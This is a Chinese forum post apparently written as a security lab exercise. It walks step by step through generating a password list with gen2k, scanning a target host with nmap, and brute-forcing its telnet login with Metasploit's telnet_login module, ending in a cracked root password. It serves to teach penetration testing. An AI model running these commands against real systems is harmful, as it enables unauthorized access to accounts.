搜索
查看: 2536|回复: 1

Metasploit批量验证爆破telnet

[复制链接]

666

主题

966

帖子

2462

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2462

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2017-12-30 14:22:05 来自手机 | 显示全部楼层 |阅读模式
Metasploit批量验证爆破telnet

    实验原理:
        
        1) 利用gen2k工具,根据收集来的信息,自动生成密码,使用枚举的方法破解telnet登陆密码。
        
    实验步骤:   
        
        一、利用gen2k工具生成密码表
        
            1.1 使用gen2k工具生成密码表。单击桌面空白处,右键菜单选择“在终端中打开”
            1.2 在终端中输入命令“cd /home”,进入软件目录,在终端中输入命令“more user.txt”,查看已收集到的关键词文件“user.txt”,利用此文件生成对应的密码
            1.3 在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”,生成密码文件passwd.txt,在终端下输入命令“more passwd.txt”,查看生成的内容
        
        二、利用Metasploit暴破目标主机telnet服务
        
            2.1 在终端中输入命令“nmap –sV 192.168.1.3”,扫描目标主机,发现目标主机开启telnet服务
            2.2 在终端中输入命令“msfconsole”,启动MSF终端
            2.3 在终端中输入命令“search telnet”,搜索telnet的相关工具和攻击载荷
            2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下
            2.5 在终端中输入命令“set RHOSTS 192.168.1.3”,设置目标主机的IP地址。
            2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”,爆破时使用的密码文件为passwd.txt。
            2.7 在终端中输入命令“set USER_FILE /home/user.txt”,爆破时使用的用户名文件为user.txt。
            2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。
            2.9 拆解到密码
            2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

0

主题

11

帖子

32

积分

新手开车

Rank: 1

积分
32
发表于 2017-12-30 22:37:34 来自手机 | 显示全部楼层
我喜欢学习
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表